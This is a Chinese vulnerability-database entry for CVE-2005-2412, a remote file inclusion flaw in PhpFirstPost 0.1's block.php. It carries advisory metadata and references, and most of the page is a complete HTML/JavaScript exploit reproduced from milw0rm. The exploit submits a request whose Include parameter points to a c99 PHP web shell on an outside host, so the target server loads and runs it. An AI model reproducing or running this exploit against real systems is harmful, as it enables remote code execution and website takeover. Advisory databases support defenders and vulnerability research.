PHPFirstpost 'Block.PHP'远程文件包含漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1112930 漏洞类型 输入验证
发布时间 2007-05-12 更新时间 2007-05-12
CVE编号 CVE-2005-2412 CNNVD-ID CNNVD-200508-038
漏洞平台 PHP CVSS评分 5.0
|漏洞来源
https://www.exploit-db.com/exploits/3906
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200508-038
|漏洞详情
PHPFirstPost中的block.php文件存在PHP远程文件包含漏洞。这使得远程攻击者可以借助于Internet参数执行任意的PHP代码。
|漏洞EXP
<html>
<head>
<title>..:: PhpFirstPost blog   Remote File Include Exploit ::..</title>

<script language="JavaScript">

/*


        \\\|///
      \\  - -  //
       (  @ @ )
----oOOo--(_)-oOOo---------------------------------------------------

[ Y! Underground Group ]
[   Dj7xpl@yahoo.com   ]
[    Dj7xpl.2600.ir    ]

----ooooO-----Ooooo--------------------------------------------------
    (   )     (   )
     \ (       ) /
      \_)     (_/

---------------------------------------------------------------------

[!] Portal   :   PhpFirstPost 0.1
[!] Download :   http://sourceforge.net/projects/phpfirstpost/
[!] Type     :   Remote File Include Exploit

---------------------------------------------------------------------

*/

 var path="/"
 var adress="block.php?" 
 var include ="Include=" 
 var phpshell="http://dj7xpl.by.ru/shell/c99.php?" 

 function command(){
     if (document.rfi.target1.value==""){
        alert("Exploit Failed...");
    return false;
  }



rfi.action= document.rfi.target1.value+path+adress+include+phpshell;
rfi.submit(); 
 }
</script>

</head>

<body bgcolor="#198ccd">
<center>

<p></p>
<form method="post" target="getting" name="rfi" onSubmit="command();">
  <b><font face="batangche" size="3" color="white">Target:</font><font
face="Arial" size="2"
color="white">http://Target.ir/blog</font><br><br>
<font color="#00FF00"size="+1" face="batangche">
</font>
<font color="red" size="2"></font></b>
<input type="text" name="target1" size="20" style="background-color:
white" onmouseover="javascript:this.style.background='red';"
onmouseout="javascript:this.style.background='red';"></p>
<p>
<input type="submit" value="Go -->" name="B1">
<input type="reset" value="Clear" name="B2"></p>
</form>
<p><br>
<iframe name="getting" height="337" width="633" scrolling="yes"
frameborder="0"></iframe>
</p><br><br>
<p><font color="red" size="2" face="batang">Dj7xpl @ Yahoo . com </font></p>
</center>
</body>
</html>

# milw0rm.com [2007-05-12]
|参考资料

来源:XF
名称:php-firstpost-block-file-include(21513)
链接:http://xforce.iss.net/xforce/xfdb/21513
来源:BID
名称:14371
链接:http://www.securityfocus.com/bid/14371
来源:OSVDB
名称:18394
链接:http://www.osvdb.org/18394
来源:SECTRACK
名称:1014563
链接:http://securitytracker.com/id?1014563
来源:BUGTRAQ
名称:20050724PHPFirstPostremotefileincludevulnerability
链接:http://marc.theaimsgroup.com/?l=bugtraq&m=112230599222543&w=2